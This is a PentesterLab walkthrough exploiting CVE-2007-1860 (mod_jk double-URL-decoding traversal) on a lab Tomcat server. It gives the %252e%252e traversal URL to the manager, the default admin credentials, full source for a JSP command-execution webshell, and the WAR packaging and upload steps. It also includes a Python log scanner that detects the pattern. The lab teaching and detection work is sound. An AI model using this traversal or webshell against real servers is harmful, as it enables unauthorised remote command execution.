Pentesterlab--cve-2007-1860

By means of these seven considerations I can forecast victory or defeat. —– The Art of War

This course details the exploitation of a vulnerability in mod_jk and how by using this issue it is possible to access the administration interface of a Tomcat server (Tomcat’s manager). Then using this access, we will see how an attacker can use default credentials to log in as administrator and use this access to gain code execution on the server. —Pentesterlab

Difficulty: 2/5

Forces:

  • Nmap
  • NC
  • Firebug
  • webshell

Detail Assessment and Planning

  • Port scan to identify open ports, running services and service versions. —– Nmap
  • Check HTTP headers. —– NC
  • Exploit and upload webshell. —– Firebug

Waging War

Weaknesses and Strengths

Used Nmap to identify open ports. TCP port 80 is open and an Apache service is running on it.

By checking the application's HTTP headers with nc, I can also get the Apache service version.

GET / HTTP/1.1
Host: 192.168.79.168

Attack

First of all, we need to figure out how Apache and Tomcat are set up together. Read here

If we try to visit a non-existent page, we receive a 404 error like this:

Based on the result, we know that this HTTP request was processed by Apache.

If we try to visit a page like 192.168.79.168/examples/jsp/test404, we get a 404 error like this:

Then we know that this HTTP request was processed by Tomcat, through Apache.

Tomcat Manager is available at the URI /manager/html and is, most of the time, protected by a password. The CVE-2007-1860 vulnerability is described in the advisory.

From pentesterlab,

If you provide this %252e to a vulnerable mod_jk, it will perform a first decoding and send the value %2e to Tomcat. Tomcat will then perform a second decoding to get the value .. If you use %252e%252e, you will then be able to send .. to Tomcat. If you try to send .. directly to Apache, it will not forward the request to Tomcat unless the path resolves to a path configured to be forwarded to Tomcat (using mod_jk).

Now we know how to access /manager/html (sometimes you may need to repeat %252e%252e/ several times):

http://192.168.79.168/examples/jsp/%252e%252e/%252e%252e/manager/html
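The double-decoding behaviour quoted above, turned into an added log check (my own example, not PentesterLab's code): each request path is decoded once (what Apache/mod_jk sees) and a second time (what Tomcat sees), and a request is flagged when a `..` segment only shows up after the second pass. The sample request lines are constructed.

```python
from urllib.parse import unquote

# Constructed sample access-log request lines (not taken from the original page).
SAMPLE_REQUESTS = [
    "GET /examples/jsp/index.jsp HTTP/1.1",
    "GET /examples/jsp/%2e%2e/manager/html HTTP/1.1",
    "GET /examples/jsp/%252e%252e/%252e%252e/manager/html HTTP/1.1",
    "GET /examples/%252e%252e/webshell/ HTTP/1.1",
]

def decode_stages(path):
    """Return [raw, after the 1st decode (Apache/mod_jk), after the 2nd decode (Tomcat)]."""
    once = unquote(path)
    return [path, once, unquote(once)]

def has_dotdot_segment(path):
    """True if the path contains a literal '..' segment."""
    return any(seg == ".." for seg in path.split("/"))

def resolve(path):
    """Collapse '.' and '..' segments to show which resource Tomcat finally maps to."""
    out = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
        else:
            out.append(seg)
    return "/" + "/".join(out)

def classify(request_line):
    """Return (verdict, resolved_path) for one access-log request line.
    'plain-traversal': '..' is visible after one decode, so Apache itself sees it.
    'double-encoded' : '..' appears only after the second decode, the CVE-2007-1860
                       pattern (Apache does not see it, Tomcat does). 'ok': neither."""
    parts = request_line.split()
    path = parts[1] if len(parts) > 1 else request_line
    _, once, twice = decode_stages(path)
    if has_dotdot_segment(once):
        return "plain-traversal", resolve(twice)
    if has_dotdot_segment(twice):
        return "double-encoded", resolve(twice)
    return "ok", resolve(twice)

def scan(lines):
    """Classify every request line; returns a list of (line, verdict, resolved_path)."""
    return [(line, *classify(line)) for line in lines]
```

Run against a real access log, the "double-encoded" verdict plus the resolved path (for example /manager/html) is the signal worth alerting on, since a front-end Apache would otherwise never forward that path.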

The credentials are one of the default ones. In this exercise, the admin didn't change the credentials: the user name is admin and the password is empty. Once we have them, we are able to get access to the Tomcat Manager.

Now we need to create a webshell and upload it to Tomcat.

Deploy a webshell

Webshell (from PentesterLab; you may also generate one using msfvenom):

index.jsp

<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
   // Run the command passed in the "cmd" parameter and collect its standard output
   String cmd = request.getParameter("cmd");
   String output = "";
   if(cmd != null) {
      String s = null;
      try {
         Process p = Runtime.getRuntime().exec(cmd,null,null);
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) { output += s+"<br>"; }
      }  catch(IOException e) {   e.printStackTrace();   }
   }
%>
<pre><%=output %></pre>

Now we have to pack the webshell into a WAR file:

$ mkdir webshell
$ cp index.jsp webshell

$ cd webshell
$ jar -cvf ../webshell.war *

The webshell, webshell.war, is ready to fire.

Upload webshell

We can use the Tomcat Manager's upload form to deploy the war file:

However, it will return a 404 page, since the form's deployment URL does not use the double-encoding trick that got us into the manager. So we have to use Firebug to give the form the right location.

Change the location to:

After the webshell is uploaded successfully, it shows up in the Tomcat Manager:

Now we can use the webshell by accessing:

http://192.168.79.168/examples/%252e%252e/webshell/

DONE